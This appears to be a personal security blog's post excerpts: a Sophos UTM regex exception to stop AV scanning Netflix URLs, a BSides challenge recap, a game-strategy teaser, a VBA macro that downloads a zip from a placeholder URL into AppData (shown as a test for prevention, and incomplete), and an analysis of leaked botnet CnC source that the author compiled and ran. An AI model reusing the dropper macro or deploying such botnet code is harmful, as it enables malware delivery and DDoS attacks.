*** This solution no longer works with updates that Sophos has applied or changes that Netflix has made!
I was helping a friend with a Sophos UTM and found that netflix would not stream on their mobile devices. We went into the settings and through studying the weblog and how netflix URL's are put togehter and created the following regex to add an exception so the AV would not scan the URL:
Below is a screenshot of the exception that was created:
Now as long as the bot masters do not create a bot that uses that regex to exfil data it will work great!! Oh by-the-way the Sophos UTM is free for home use. It is a nice Unified Threat Management (UTM) for home use and is a lot better than a router you can buy out of the store.
At BSides 2016 I participated in their Hackers Challenge. The challenges were based on reverse engineering, network packet analysis, and many other puzzles that you needed to figure out. When I had hit the wall at 3AM in the morning on March 11th I was in 2nd place. By the end of the competition which was at 10AM I had dropped to 7th. The challenge was great! Thanks BSides...
Check-out the django.nV project. This is a project that was used in the Hackers Challenge but was adapted from its original state.
Screenshot of being in 2nd place at 3AM.
Screenshot of being in 7th place at the end of the competition.
One thing to note is most of the challenges were worth 4,000 points in the beginning. If you did the challenge and no-one else you kept the 4,000 points. For each participant that accomplished the challenge you had to divide the points with them.
On the side I have been playing a game created by Kixeye called Vega Conflict. Their description of the game is below:
Stake your claim, command your fleets, and wage epic war in space. Band together with other players in a bloody rebellion to take back the galaxy from the evil VEGA Federation. CUSTOMIZE YOUR WAR: Different targets call for different strategy, outfit your fleet for victory. REAL-TIME PvP: Real war doesn’t wait its turn - attack enemies at will in real-time. BATTLE ANYWHERE: Conflict never ends. Continue your progress on phone, tablet, or in browser.
In the game you progress based on leveling the buildings on your planet. Currently in the game I have a level 7 Fleet Bay which allows you to have a maximum of 7 Fleets. Each Fleet can only have a total mass of 10,100. This presents a difficulty in taking all of the ships that you have built and creating 7 Fleets with as close as you can get the maximum mass for each fleet. A note on strategy: The best strategy is …
Below is a Visual Basic for Applications script I quickly build to download a file through a Macro to the computer. This was to test the capability of being able to do it and finding a way to prevent it from occurring.
' vTest Macro
Dim myURL As String
dURL = "http://blah/text.zip"
Dim WinHttpReq As Object
Dim fileName As String
fileName = Environ("AppData") & "\microsoft\text.zip"
Set WinHttpReq = CreateObject("Microsoft.XMLHTTP")
WinHttpReq.Open "GET", dURL
If WinHttpReq.Status = 200 Then
Set oStream = CreateObject("ADODB.Stream")
oStream.Type = 1
oStream.SaveToFile fileName, 2
Through the information gathered inside of the binaries I began searching for unique strings on Google. One of the unique strings that I searched for was "HTTPFLOOD GHP". This pulled back less than 10 results and the first one was from the site hxxp://psbdmp.com/wT1htV9b. This contained the source code for what they called "Palkia Server.c".
This particular piece of source code was found to have been leaked on 2016-11-12 09:58:05 according to the timestamp on the paste. I have not validated that the binary in which I found the string matches up with this particular CnC Server source code.
After looking at the source code and understanding the logic, verifying there were no backdoors and other intents to infect my systems I compiled the source code on a temporary server. Upon execution you need to specify which port it listens on for the bot connections and the number of threads it will utilize.
After you specify the port and the number of threads it begins to …